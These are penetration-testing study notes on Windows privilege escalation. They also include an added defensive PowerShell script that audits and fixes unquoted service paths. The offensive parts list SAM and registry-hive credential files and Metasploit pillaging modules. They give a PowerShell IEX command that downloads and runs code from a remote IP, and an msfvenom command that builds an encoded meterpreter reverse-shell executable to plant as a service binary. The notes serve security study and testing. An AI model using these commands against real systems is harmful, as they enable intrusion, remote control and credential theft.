Version of Windows

winver.exe
msinfo32.exe

AnasAboureada/Penetration-Testing-Study-Notes

Automated Scripts

post/windows/gather  # Metasploit pillaging modules
scraper              # Metasploit automatic pillaging script. Harvests system information, including network shares, registry hives, and password hashes.
Sherlock.ps1 (deprecated)
Watson
Windows Exploit Suggester - Next Generation (WES-NG)
winenum              # Metasploit automatic pillaging script. Retrieves information about the system, including environment variables, network interfaces, routing, user accounts, etc.
PowerSploit
Empire

Files of Interest

%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\RegBack\system

# Check write permissions of files and folders
icacls <folder>

# Display the resources shared on the victim
net share

# Download a file with PowerShell
powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://www.xyz.net/file.txt','C:\tmp\file.txt')

# Download a script with PowerShell and run it in memory (IEX executes the downloaded string)
powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.135/41020.exe')

# Create a simple HTTP file server that the target can reach (Python 2's SimpleHTTPServer module)
python -m SimpleHTTPServer 8080

# Is ubuntu.exe or bash.exe installed on the Windows machine? That suggests the Windows Subsystem for Linux is installed.
# If so, bash.exe can be run from Windows and gives root access.

Unquoted Service Paths

List all services with an unquoted service path.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

  1. If any are found, check the permissions on each directory in the path: icacls "C:\Program Files\Some Software\"
  2. Create a malicious .exe that sends a reverse shell to your machine (assuming no antivirus): msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[attack machine] LPORT=443 -f exe -o servicename.exe
  3. Restart the service: sc stop [service name], then sc start [service name]

Metasploit: exploit/windows/local/trusted_service_path
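A defender-side audit for the unquoted service path issue described above, written in PowerShell as an added example (it is not code from these notes or from the AnasAboureada repository). It reads the same Win32_Service data the wmic command uses, keeps only services whose executable path is unquoted and contains a space (a space only in the arguments is not exploitable, so it is skipped), checks each directory Windows would probe for write access by Everyone, Users or Authenticated Users (the check the icacls step does by hand), and with the -Fix switch quotes the ImagePath in the registry so the service control manager no longer has to guess. The -Fix switch, the function names and the low-privilege principal list are this example's own choices, not built-in cmdlets or settings.

```powershell
# Added example (not part of the original notes): find services with unquoted
# executable paths that contain spaces, report which probe directories are
# writable by low-privileged principals, and optionally quote the path.
# Run from an elevated PowerShell prompt. -Fix is this script's own switch.
param([switch]$Fix)

# Principals whose write access on a probe directory would let a standard user
# plant a binary there. Extend this list for your environment (assumption).
$LowPriv = @('Everyone', 'BUILTIN\Users',
             'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# FileSystemRights.Write covers WriteData/AppendData/WriteAttributes/WriteEA.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write

function Test-LowPrivWrite {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPriv -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band [int]$WriteMask) -ne 0) { return $true }
        # Some inherited ACEs carry raw GENERIC_WRITE / GENERIC_ALL bits instead.
        if (($rights -band 0x40000000) -ne 0 -or ($rights -band 0x10000000) -ne 0) { return $true }
    }
    return $false
}

# Split an unquoted command line into the executable (up to the first .exe,
# an assumption that covers normal Win32 services) and its arguments.
function Get-ExecutablePart {
    param([string]$PathName)
    if ($PathName -match '^(?<exe>.+?\.exe)(?<rest>\s.*)?$') {
        return @{ Exe = $Matches['exe']; Rest = $Matches['rest'] }
    }
    return $null
}

# Directories Windows probes while resolving the unquoted path: for
# "C:\Program Files\Some Software\svc.exe" it tries C:\Program.exe, then
# C:\Program Files\Some.exe, before the real binary.
function Get-ProbeDirectories {
    param([string]$Exe)
    $parts = $Exe -split ' '
    $dirs = for ($i = 1; $i -le $parts.Count; $i++) {
        Split-Path -Path ($parts[0..($i - 1)] -join ' ') -Parent
    }
    $dirs | Where-Object { $_ } | Select-Object -Unique
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { continue }
        $split = Get-ExecutablePart $p
        # No space inside the executable path itself: the SCM cannot misparse it.
        if (-not $split -or $split.Exe -notmatch ' ') { continue }
        $writable = Get-ProbeDirectories $split.Exe | Where-Object { Test-LowPrivWrite $_ }
        [pscustomobject]@{
            Name         = $svc.Name
            StartMode    = $svc.StartMode
            PathName     = $p
            WritableDirs = @($writable)
        }
    }
}

# Remediation: the SCM reads ImagePath under the service key; quoting the
# executable removes the ambiguity without touching the binary.
function Repair-ServicePath {
    param([string]$Name, [string]$PathName)
    $split = Get-ExecutablePart $PathName
    $fixed = '"{0}"{1}' -f $split.Exe, $split.Rest
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Name" -Name ImagePath -Value $fixed
    return $fixed
}

foreach ($f in Get-UnquotedServicePath) {
    $risk = if ($f.WritableDirs.Count -gt 0) { 'WRITABLE BY LOW-PRIV' } else { 'path only' }
    Write-Output ("{0,-30} {1,-8} {2}  [{3}]" -f $f.Name, $f.StartMode, $f.PathName, $risk)
    foreach ($d in $f.WritableDirs) { Write-Output "    writable: $d" }
    if ($Fix) { Write-Output ("    fixed -> " + (Repair-ServicePath -Name $f.Name -PathName $f.PathName)) }
}
```

Run it without -Fix first to review the findings; a service listed as "path only" is misconfigured but not exploitable by a standard user until one of its probe directories becomes writable, which is why the ACL check on each directory matters as much as the missing quotes.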

Permissions

Network

net group "Domain Controllers" /domain   # Print the list of domain controllers
net view /domain                          # Check whether the machine is part of a domain, or is the domain controller
netsh firewall show config
netsh firewall show state                 # Firewall settings
netstat -ano                              # Display all host connections, listening ports, established connections, etc., and the process associated with each connection